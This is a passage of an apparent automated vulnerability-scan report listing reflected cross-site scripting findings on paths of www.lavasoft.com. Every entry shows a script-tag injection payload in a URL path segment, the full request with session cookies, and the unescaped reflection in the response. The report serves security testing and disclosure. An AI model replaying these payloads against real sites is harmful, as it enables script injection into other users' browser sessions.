User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18300
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/node3037e'><script>alert(1)</script>5801b21d286/node.css'>
...[SNIP]...

1.193. http://www.lavasoft.com/mylavasoft/modules/node/node.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/node/node.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78f8b'><script>alert(1)</script>621f0eb0c19 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/node/node.css78f8b'><script>alert(1)</script>621f0eb0c19?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18300
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/node/node.css78f8b'><script>alert(1)</script>621f0eb0c19'>
...[SNIP]...

1.194. http://www.lavasoft.com/mylavasoft/modules/quote/quote.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/quote/quote.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9147f'><script>alert(1)</script>280704c335d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft9147f'><script>alert(1)</script>280704c335d/modules/quote/quote.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10627
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft9147f'><script>alert(1)</script>280704c335d/modules/quote/quote.css?w'>
...[SNIP]...

1.195. http://www.lavasoft.com/mylavasoft/modules/quote/quote.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/quote/quote.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 53b79'><script>alert(1)</script>c3abaa8a500 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules53b79'><script>alert(1)</script>c3abaa8a500/quote/quote.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18232
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules53b79'><script>alert(1)</script>c3abaa8a500/quote/quote.css'>
...[SNIP]...

1.196. http://www.lavasoft.com/mylavasoft/modules/quote/quote.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/quote/quote.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c90a'><script>alert(1)</script>63d1c6ba5a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/quote3c90a'><script>alert(1)</script>63d1c6ba5a8/quote.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18194
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/quote3c90a'><script>alert(1)</script>63d1c6ba5a8/quote.css'>
...[SNIP]...

1.197. http://www.lavasoft.com/mylavasoft/modules/quote/quote.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/quote/quote.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d73a9'><script>alert(1)</script>7f6206abc9a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/quote/quote.cssd73a9'><script>alert(1)</script>7f6206abc9a?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18194
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/quote/quote.cssd73a9'><script>alert(1)</script>7f6206abc9a'>
...[SNIP]...

1.198. http://www.lavasoft.com/mylavasoft/modules/system/defaults.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e425'><script>alert(1)</script>4fd9962d7ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft2e425'><script>alert(1)</script>4fd9962d7ca/modules/system/defaults.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10631
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft2e425'><script>alert(1)</script>4fd9962d7ca/modules/system/defaults.css?w'>
...[SNIP]...

1.199. http://www.lavasoft.com/mylavasoft/modules/system/defaults.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8570e'><script>alert(1)</script>ce7e18db5c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules8570e'><script>alert(1)</script>ce7e18db5c1/system/defaults.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18240
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules8570e'><script>alert(1)</script>ce7e18db5c1/system/defaults.css'>
...[SNIP]...

1.200. http://www.lavasoft.com/mylavasoft/modules/system/defaults.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63e8b'><script>alert(1)</script>c48b6ddd3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/system63e8b'><script>alert(1)</script>c48b6ddd3ab/defaults.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18202
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/system63e8b'><script>alert(1)</script>c48b6ddd3ab/defaults.css'>
...[SNIP]...

1.201. http://www.lavasoft.com/mylavasoft/modules/system/defaults.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/defaults.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19bd4'><script>alert(1)</script>08090652a8b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/system/defaults.css19bd4'><script>alert(1)</script>08090652a8b?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18202
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/system/defaults.css19bd4'><script>alert(1)</script>08090652a8b'>
...[SNIP]...

1.202. http://www.lavasoft.com/mylavasoft/modules/system/system-menus.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4100d'><script>alert(1)</script>f6e60007ec8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft4100d'><script>alert(1)</script>f6e60007ec8/modules/system/system-menus.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10635
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft4100d'><script>alert(1)</script>f6e60007ec8/modules/system/system-menus.css?w'>
...[SNIP]...

1.203. http://www.lavasoft.com/mylavasoft/modules/system/system-menus.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab356'><script>alert(1)</script>4322317a08b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modulesab356'><script>alert(1)</script>4322317a08b/system/system-menus.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18248
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modulesab356'><script>alert(1)</script>4322317a08b/system/system-menus.css'>
...[SNIP]...

1.204. http://www.lavasoft.com/mylavasoft/modules/system/system-menus.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system-menus.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7668'><script>alert(1)</script>dd59b0cd693 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/systema7668'><script>alert(1)</script>dd59b0cd693/system-menus.css?w HTTP/1.1
Host: www.lavasoft.com
